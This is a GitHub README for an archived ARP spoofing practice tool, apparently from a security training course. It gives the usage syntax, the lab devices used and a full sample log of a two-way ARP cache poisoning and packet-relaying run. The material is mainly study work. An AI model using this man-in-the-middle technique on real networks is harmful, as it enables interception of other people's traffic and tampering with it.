Skip to content
This repository has been archived by the owner on Jul 3, 2024. It is now read-only.

Latest commit

 

History

History
110 lines (89 loc) · 3.24 KB

README.md

File metadata and controls

110 lines (89 loc) · 3.24 KB

arp-spoofing

arp spoofing practice

syntax : arp-spoof <interface> <sender ip 1> <target ip 1> [<sender ip 2> <target ip 2>...]
sample : arp-spoof wlan0 192.168.10.2 192.168.10.1 192.168.10.1 192.168.10.2

Ref

About ARP


Sample execution

Used devices

attacker (linux guest os)
sender (iphone, KITRI_DEV)
target (KITRI_DEV, iphone)

Log

oxdjww@oxdjww-virtual-machine:~/Desktop/gilgil/arp-spoofing$ sudo ./arp-spoof ens33 10.1.1.150 10.1.1.1 10.1.1.1 10.1.1.150

----------------------------------------
[*] arp-spoof #1..
----------------------------------------

----------------------------------------
[*] get host info..
----------------------------------------
[+] attackerIp   : 10.1.1.96
[+] attackerMac  : 00:0C:29:C9:33:3C

----------------------------------------
[*] get sender Info..
----------------------------------------

----------------------------------------
[*] Arp packet sending succeeded!
----------------------------------------
[+] senderIp    : 10.1.1.150
[+] senderMac   : AA:CA:47:90:49:E0

----------------------------------------
[*] get target Info..
----------------------------------------

----------------------------------------
[*] Arp packet sending succeeded!
----------------------------------------
[+] targetIp    : 10.1.1.1
[+] targetMac   : 88:36:6C:9F:83:3C

----------------------------------------
[*] arp-spoof #2..
----------------------------------------

----------------------------------------
[*] get host info..
----------------------------------------
[+] attackerIp   : 10.1.1.96
[+] attackerMac  : 00:0C:29:C9:33:3C

----------------------------------------
[*] get sender Info..
----------------------------------------

----------------------------------------
[*] Arp packet sending succeeded!
----------------------------------------
[+] senderIp    : 10.1.1.1
[+] senderMac   : 88:36:6C:9F:83:3C

----------------------------------------
[*] get target Info..
----------------------------------------

----------------------------------------
[*] Arp packet sending succeeded!
----------------------------------------
[+] targetIp    : 10.1.1.150
[+] targetMac   : AA:CA:47:90:49:E0

----------------------------------------
[*] Arp packet sending succeeded!
----------------------------------------

----------------------------------------
[*] Arp packet sending succeeded!
----------------------------------------

----------------------------------------
[*] Ip packet relaying succeeded!
----------------------------------------

----------------------------------------
[*] Ip packet relaying succeeded!
----------------------------------------

----------------------------------------
[*] Arp packet sending succeeded!
----------------------------------------
...

References

Spoofed Ip packet (ICMP Request)

infected_request

Relaying Ip packet (ICMP Request)

relay_request

Receiving Ip packet (ICMP Reply)

reply